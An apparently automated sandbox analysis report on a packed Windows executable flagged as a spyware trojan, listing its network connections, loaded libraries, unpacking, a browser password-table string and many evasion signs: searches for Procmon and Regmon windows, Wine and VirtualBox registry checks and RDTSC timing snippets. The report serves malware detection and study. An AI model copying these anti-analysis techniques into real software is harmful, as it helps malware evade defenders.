              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49700 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49702 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49703 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49741 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.11.101:443 -> 192.168.2.7:49748 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: ARoqFi68Nr.exeStatic PE information: section name:
              Source: ARoqFi68Nr.exeStatic PE information: section name: .rsrc
              Source: ARoqFi68Nr.exeStatic PE information: section name: .idata
              Source: ARoqFi68Nr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: ARoqFi68Nr.exeStatic PE information: Section: ZLIB complexity 0.9996297998366013
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@1/1
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ARoqFi68Nr.exe, 00000000.00000003.1363608844.00000000056AA000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389586999.0000000005690000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1365110657.000000000568E000.00000004.00000800.00020000.00000000.sdmp, ARoqFi68Nr.exe, 00000000.00000003.1389429452.000000000569D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: ARoqFi68Nr.exeReversingLabs: Detection: 55%
              Source: ARoqFi68Nr.exeVirustotal: Detection: 52%
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile read: C:\Users\user\Desktop\ARoqFi68Nr.exeJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: ARoqFi68Nr.exeStatic file information: File size 2935296 > 1048576
              Source: ARoqFi68Nr.exeStatic PE information: Raw size of trvrqxmv is bigger than: 0x100000 < 0x2a2e00

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeUnpacked PE file: 0.2.ARoqFi68Nr.exe.560000.0.unpack :EW;.rsrc :W;.idata :W;trvrqxmv:EW;fllfikzu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;trvrqxmv:EW;fllfikzu:EW;.taggant:EW;
              Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
              Source: ARoqFi68Nr.exeStatic PE information: real checksum: 0x2cf6b0 should be: 0x2d8a06
              Source: ARoqFi68Nr.exeStatic PE information: section name:
              Source: ARoqFi68Nr.exeStatic PE information: section name: .rsrc
              Source: ARoqFi68Nr.exeStatic PE information: section name: .idata
              Source: ARoqFi68Nr.exeStatic PE information: section name: trvrqxmv
              Source: ARoqFi68Nr.exeStatic PE information: section name: fllfikzu
              Source: ARoqFi68Nr.exeStatic PE information: section name: .taggant
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeCode function: 0_3_0567F74C push esi; retf 0_3_0567F74F
              Source: ARoqFi68Nr.exeStatic PE information: section name: entropy: 7.981577934195685

              Boot Survival

              barindex
              Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: RegmonClassJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: FilemonClassJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: FilemonclassJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWindow searched: window name: RegmonclassJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeSystem information queried: FirmwareTableInformationJump to behavior
              Tries to detect sandboxes / dynamic malware analysis system (registry check)
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
              Tries to detect virtualization through RDTSC time measurements
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73AC5D second address: 73AC61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73ADAE second address: 73ADB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73ADB2 second address: 73ADB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73ADB6 second address: 73ADBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73AEF5 second address: 73AF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F08C2F7D6h 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B041 second address: 73B04C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4B6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B1B2 second address: 73B1B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B1B9 second address: 73B1CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F9F08C2E4BBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73B419 second address: 73B421 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D553 second address: 5B8D85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 add dword ptr [esp], 01A3DF5Ah 0x0000000e and dx, A96Ch 0x00000013 push dword ptr [ebp+122D15E9h] 0x00000019 push edx 0x0000001a pop ecx 0x0000001b call dword ptr [ebp+122D1CC7h] 0x00000021 pushad 0x00000022 cmc 0x00000023 xor eax, eax 0x00000025 jne 00007F9F08C2E4B7h 0x0000002b cmc 0x0000002c mov edx, dword ptr [esp+28h] 0x00000030 or dword ptr [ebp+122D2B4Eh], ebx 0x00000036 mov dword ptr [ebp+122D2CD6h], eax 0x0000003c jmp 00007F9F08C2E4BEh 0x00000041 mov esi, 0000003Ch 0x00000046 clc 0x00000047 add esi, dword ptr [esp+24h] 0x0000004b clc 0x0000004c lodsw 0x0000004e pushad 0x0000004f mov dword ptr [ebp+122D1C9Eh], esi 0x00000055 mov ebx, eax 0x00000057 popad 0x00000058 add eax, dword ptr [esp+24h] 0x0000005c jmp 00007F9F08C2E4C9h 0x00000061 mov ebx, dword ptr [esp+24h] 0x00000065 sub dword ptr [ebp+122D2599h], edi 0x0000006b push eax 0x0000006c push eax 0x0000006d push edx 0x0000006e push edi 0x0000006f jmp 00007F9F08C2E4C3h 0x00000074 pop edi 0x00000075 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5BA second address: 73D5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5C0 second address: 73D5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5C5 second address: 73D5CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D5CC second address: 73D61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 537F8063h 0x0000000e mov dl, 9Ch 0x00000010 push 00000003h 0x00000012 mov esi, eax 0x00000014 mov edi, dword ptr [ebp+122D2D82h] 0x0000001a push 00000000h 0x0000001c jmp 00007F9F08C2E4C3h 0x00000021 mov edx, dword ptr [ebp+122D2C12h] 0x00000027 push 00000003h 0x00000029 mov edx, dword ptr [ebp+122D3BFBh] 0x0000002f mov dword ptr [ebp+122D2855h], esi 0x00000035 push A61D6E8Eh 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007F9F08C2E4B6h 0x00000043 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6C5 second address: 73D6D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6D2 second address: 73D6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6D8 second address: 73D6DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D6DD second address: 73D70D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a and ecx, dword ptr [ebp+122D2C86h] 0x00000010 push 00000000h 0x00000012 mov cl, 8Eh 0x00000014 call 00007F9F08C2E4B9h 0x00000019 push edi 0x0000001a jmp 00007F9F08C2E4BAh 0x0000001f pop edi 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D70D second address: 73D726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2F7E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D726 second address: 73D72C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D72C second address: 73D752 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9F08C2F7E8h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D752 second address: 73D758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D87B second address: 73D8DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7E8h 0x00000008 js 00007F9F08C2F7D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 ja 00007F9F08C2F7D6h 0x0000001a pop eax 0x0000001b jnp 00007F9F08C2F7EDh 0x00000021 jmp 00007F9F08C2F7E7h 0x00000026 popad 0x00000027 nop 0x00000028 movsx ecx, ax 0x0000002b push 00000000h 0x0000002d mov esi, dword ptr [ebp+122D2AD9h] 0x00000033 push 1B9486EDh 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D8DC second address: 73D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9F08C2E4B6h 0x0000000a popad 0x0000000b jl 00007F9F08C2E4BCh 0x00000011 je 00007F9F08C2E4B6h 0x00000017 popad 0x00000018 xor dword ptr [esp], 1B94866Dh 0x0000001f push 00000000h 0x00000021 push ecx 0x00000022 call 00007F9F08C2E4B8h 0x00000027 pop ecx 0x00000028 mov dword ptr [esp+04h], ecx 0x0000002c add dword ptr [esp+04h], 00000018h 0x00000034 inc ecx 0x00000035 push ecx 0x00000036 ret 0x00000037 pop ecx 0x00000038 ret 0x00000039 jng 00007F9F08C2E4BBh 0x0000003f mov edi, 3B0B141Bh 0x00000044 movzx ecx, di 0x00000047 add dword ptr [ebp+122D2538h], edi 0x0000004d push 00000003h 0x0000004f je 00007F9F08C2E4B6h 0x00000055 push 00000000h 0x00000057 jnl 00007F9F08C2E4BCh 0x0000005d mov edi, dword ptr [ebp+122D2CB2h] 0x00000063 push 00000003h 0x00000065 pushad 0x00000066 call 00007F9F08C2E4BAh 0x0000006b movsx eax, dx 0x0000006e pop edx 0x0000006f mov esi, dword ptr [ebp+122D2D06h] 0x00000075 popad 0x00000076 call 00007F9F08C2E4B9h 0x0000007b jmp 00007F9F08C2E4C5h 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 push edx 0x00000084 pushad 0x00000085 popad 0x00000086 pop edx 0x00000087 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D988 second address: 73D999 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9F08C2F7DCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D999 second address: 73D9A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D9A9 second address: 73D9CC instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9F08C2F7D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b mov eax, dword ptr [eax] 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F9F08C2F7E3h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 73D9CC second address: 73DA11 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F9F08C2E4B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F9F08C2E4C6h 0x00000014 pop eax 0x00000015 or edx, dword ptr [ebp+122D2C8Eh] 0x0000001b lea ebx, dword ptr [ebp+124584D8h] 0x00000021 add cx, 8F88h 0x00000026 xchg eax, ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9F08C2E4BAh 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9C5 second address: 75E9D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9D2 second address: 75E9E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BBh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9E1 second address: 75E9E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75E9E7 second address: 75E9FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F08C2E4BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CAE0 second address: 75CAE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CAE4 second address: 75CAEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CAEA second address: 75CB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9F08C2F7DBh 0x0000000c jmp 00007F9F08C2F7E9h 0x00000011 jnc 00007F9F08C2F7D6h 0x00000017 jmp 00007F9F08C2F7E2h 0x0000001c popad 0x0000001d push eax 0x0000001e push ebx 0x0000001f jnc 00007F9F08C2F7D6h 0x00000025 jng 00007F9F08C2F7D6h 0x0000002b pop ebx 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75CB40 second address: 75CB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F9F08C2E4BDh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75D6E1 second address: 75D6E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75D988 second address: 75D98E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75D98E second address: 75D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 727138 second address: 727155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F9F08C2E4BEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jp 00007F9F08C2E4B6h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB1E second address: 75DB22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\ARoqFi68Nr.exeRDTSC instruction interceptor: First address: 75DB22 second address: 75DB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
